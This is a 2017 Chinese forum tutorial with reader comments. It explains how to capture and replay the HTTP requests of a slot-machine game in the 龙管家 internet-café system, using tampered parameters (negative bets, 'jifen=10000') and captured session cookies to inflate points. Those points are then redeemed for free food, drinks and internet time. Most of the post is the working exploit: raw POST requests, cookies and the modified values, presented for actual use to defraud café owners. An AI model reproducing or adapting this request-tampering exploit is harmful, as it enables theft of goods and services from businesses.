本帖最后由 巴拉拉小魔仙 于 2017-7-23 14:35 编辑
还有208 天就到春节了,提前跟大家说一声 春节快乐 !
这次教大家利用网吧漏洞制作一款属于自己的软件,可以白吃白喝白上网咯~
前期准备工作!
1.易语言
2.精易模块
3.WSExplorer 1.3
4.必须是龙管家系统的网吧
原理:利用网吧漏洞刷网吧积分,用积分兑换网费,饮料......
前期准备工作做好了,登录网吧系统以后,找到更换帐号(在个人中心左上角旁边) 注:不要拿本机帐号操作,建议使用QQ帐号,安全很多~
点击QQ登录,登录以后不要急着操作,先让你帐号上有点积分再操作,不然有可能不会成功...
接下来就是重点,各位易友看好没一步操作即可
1. 打开游戏,水果机进程名:sgj.exe
2 . 打开 WSExplorer 1.3 找到进程 sjg.exe 双击打开
3 . 打开水果机,找到积分按钮,随便加点分
4 . 加了分以后,随便点一样水果东西
5 . 回到 WSExplorer 1.3 右键清空 所有内容 然后回去 水果机程序 点击开始 然后会到 WSExplorer 1.3 找到 post (卧槽,刚刚网管就从我身边走过 吓了我一逼 )
现在我们得到数据信息:
POST /WebApps/sgj/getdata.php?type=getrandnum HTTP/1.1
Host: 192.168.0.247:808
Accept-Encoding: deflate, gzip
Cookie: my_uid=24293PgMrv4Xo%2BZPtotga%2FJDhEU3eKFK2g4Tv2u2xtEXRtf28w; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=vkhkd35t0ag6b13cdltdmgl2v6
Origin: http://192.168.0.247:808
Accept-Language: zh-CN,en,*
X-Requested-With: XMLHttpRequest
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Safari/535.2 wke/1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://192.168.0.247:808/WebApps/sgj/index.php
Content-Length: 69
bar=0&seven=0&star=0&watermelons=0&alarm=0&coconut=0&orange=0&apple=1
以上信息不是通行,请自行抓包
我们需要,参数是: 提交地址,提交信息, Cookie
那么
提交地址:
http://192.168.0.247:808/WebApps/sgj/getdata.php?type=getrandnum
提交信息:
bar=0&seven=0&star=0&watermelons=0&alarm=0&coconut=0&orange=0&apple=1
那么我们把提交信息改装为:
bar=-100&seven=-100&star=-100&watermelons=-100&alarm=-100&coconut=-100&orange=-100&apple=-100
cookies :
my_uid=24293PgMrv4Xo%2BZPtotga%2FJDhEU3eKFK2g4Tv2u2xtEXRtf28w; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=vkhkd35t0ag6b13cdltdmgl2v6
然后我们打开易语言,载入精易模块,用精易模块命令 网页_访问S 填写以上信息
点击按钮,返回这个信息证明,已经成功
然后 回到水果机 有个退分按钮 抓一下 这个信息 (由于时间关系,不再截图)
POST /WebApps/sgj/getdata.php?type=getgift HTTP/1.1
Host: 192.168.0.247:808
Accept-Encoding: deflate, gzip
Cookie: my_uid=2c2csjgQo6B8QEWG5pgBTwXzasQPbpQRgcLxxn8w2NQA8ChC7A; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=b1l3d76b47ut7rra7krrjvlg31
Origin: http://192.168.0.247:808
Accept-Language: zh-CN,en,*
X-Requested-With: XMLHttpRequest
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Safari/535.2 wke/1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://192.168.0.247:808/WebApps/sgj/index.php
Content-Length: 7
jifen=9
抓到以上信息, 那么
提交地址:
http://192.168.0.247:808/WebApps/sgj/getdata.php?type=getgift
提交信息:
jifen=9
修改为:
jifen=10000
Cookie:
my_uid=2c2csjgQo6B8QEWG5pgBTwXzasQPbpQRgcLxxn8w2NQA8ChC7A; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=b1l3d76b47ut7rra7krrjvlg31
回到个人中心,你会发现,积分已经变多,在个人中心的积分 积分明细那里,你能看到刚刚你刷的积分
有时候退分不成功,在水果机那,点击几次就好~
那么用积分在兑换页面....
我这里有吃的有喝的有网费的,该漏洞用了半年多,网吧老板已对本小仙产生怀疑,这里不一一演示
凡事留一线,日后好相见
有好听的歌曲 麻烦 楼下分享 一下 另外 没有JB了 土豪多可以打赏一下
评分
参与人数 20 好评 +8
精币 +47
收起
理由
1271198504
+ 1
老师,我有问题请教你 问题已经私信你了。
佳一佳
+ 1
刚从派出所出来 你说怎么办吧
lzhaitao
+ 1
+ 1
看到楼主的头像,我就知道,发这帖不是没有原因的
small莲
+ 1
+ 2
杨...杨永信
记i格式化
+ 2
看了楼主头像才知道楼主的高明之处
心中的沉默
+ 1
+ 2
我这边医院没空床了,不是缺胳膊就是少腿,我还好就是没了**
藤未枯
+ 1
+ 2
想了半天,也不知道发些什么,拜年又太俗,干脆给各位提前上柱香吧。
人各有志1
+ 1
想了半天,也不知道发些什么,干脆在这里给大家拜个早年吧,祝大家新年快乐,阖家欢乐
z352022657
+ 1
+ 2
这个我早就知道了 不过我不是用你那个 我是配合fiddle和Proxifier
一瓶矿泉水
+ 1
+ 2
惊讶居然是POST的,666楼主好想法。
深邃如海
+ 1
+ 1
要不是我现在坐着在轮椅上我就真的相信了
1990343340
+ 2
不错,等我去搬两天砖,出个复活甲再说。
初梦大大
+ 1
新技能已get√
stone2018
+ 1
新技能已get√
晓时候
+ 1
黑魔仙路过
精易神
+ 1
+ 2
新技能已get√
MrSimple
+ 1
你还别说医院wifi信号真好.
漩涡鸣人
+ 20
感谢分享,很给力!~
a379270612
+ 1
家人问我为何上个网少了一只手
我爱逗妇乳
+ 1
要不是我现在坐着在轮椅上我就真的相信了
查看全部评分
本帖被以下淘专辑推荐:
· 收藏 | 主题: 18, 订阅: 1
· 收藏 | 主题: 5, 订阅: 0
· 《精品源码》 | 主题: 17, 订阅: 0